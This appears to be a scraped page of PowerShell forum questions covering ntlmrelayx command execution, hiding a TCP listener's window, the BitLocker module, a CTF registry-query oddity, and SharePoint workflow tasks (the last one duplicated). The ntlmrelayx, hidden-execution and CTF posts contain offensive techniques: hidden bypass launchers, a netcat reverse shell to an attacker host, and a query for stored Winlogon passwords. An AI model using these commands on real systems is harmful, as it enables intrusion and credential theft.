ntlmrealyx powershell usage

I would like to know about your experience regarding the use of ntlmrelayx

When using ntlmrelayx.py -tf targets.txt -c "Powershell command" does this powershell command need to be an Empire launcher or can it be any powershell command like a powershell onliner?

Thanks

How to hide tcp port listener powershell script?

GOALS: run a powershell script without showing the window (it’s ok if it pops up for few seconds).

PROBLEM: the script tcplisten.ps1 works just if the window is displayed to the user. All the attempts below don’t work. Because when I run netstat -ano -p tcp, port 9999 is not listening.

tcplisten.ps1

$  Listener = [System.Net.Sockets.TcpListener]9999; $  Listener.Start() 

ATTEMPTS:

powershell.exe

powershell.exe -windowstyle hidden .\tcplisten.ps1 

hidden -command

powershell -windowstyle hidden -command $  Listener = [System.Net.Sockets.TcpListener]9999; $  Listener.Start() 

-NoProfile -NonInteractive -ExecutionPolicy Bypass

powershell -NoP -NonI -W Hidden -Exec Bypass -Command 

Start-Process

Start-Process powershell.exe -ArgumentList "-WindowsStyle hidden -file .\tcplisten.ps1" 

vbs script

Create a .vbs with this script and run it

command = "powershell.exe -nologo -command C:\Users\Utente\Desktop\tcplisten.ps1" set shell = CreateObject("WScript.Shell") shell.Run command,0 

QUESTION: is there a solution? Am I doing some mistake?

Bitlocker Powershell Module [migrated]

I’m newer to the topic of Powershell modules in general, finding them, downloading (or finding/installing them from the internet using find-module and install-module, etc.). But I specifically need information at the moment about finding/installing the bitlocker module. I see numerous forum references to the cmdlets in this module but no one mentions the module itself. ‘Install-module bitlocker’ errors out with ‘No match was found’ for that module name. I’m doing this from a Windows 2016 server.

Powershell (WinRM) and cmd.exe: reg query output deviation

during a CTF I encountered the following anomaly regarding PS & cmd.exe:

  • I got access to a Windows x86 server through WinRM Port 5985 using evil-winrm. (https://github.com/Hackplayers/evil-winrm) This spawns a PS shell.
  • Via the PS shell I transferred nc.exe to the machine and used cmd.exe /c “nc.exe IP PORT -e cmd.exe” to spawn an additional regular cmd.exe shell back to me.

I searched the registry for stored passwords using the following command: reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”

This is where I noticed that the PS shell reg query returns considerable more output than the cmd.exe reg query. PS includes the “DefaultPassword” entry, whereas cmd.exe does not include this value.

The full output deviation is captured in the following screenshot: req query on powershell shows more entries than req query on cmd.exe The same behavior is observable for other registry items. PS generally returns more elements than the cmd.exe “sub-shell”.

Any hints to why this behavior occurs are greatly appreciated.

Powershell script to get workflow tasks for each list item

I have a lot of number of webs (sub-sites) within a site collection that have lists that have list items with Approval workflows running on them.

How would I get all tasks for each list item in powershell? I see that the “tasks” list has the ‘Related Content’ column which has the title of the list item. How to I do a union between the two lists (the task list and the item list) in powershell?

Thanks for your help!

Powershell script to get workflow tasks for each list item

I have a lot of number of webs (sub-sites) within a site collection that have lists that have list items with Approval workflows running on them.

How would I get all tasks for each list item in powershell? I see that the “tasks” list has the ‘Related Content’ column which has the title of the list item. How to I do a union between the two lists (the task list and the item list) in powershell?

Thanks for your help!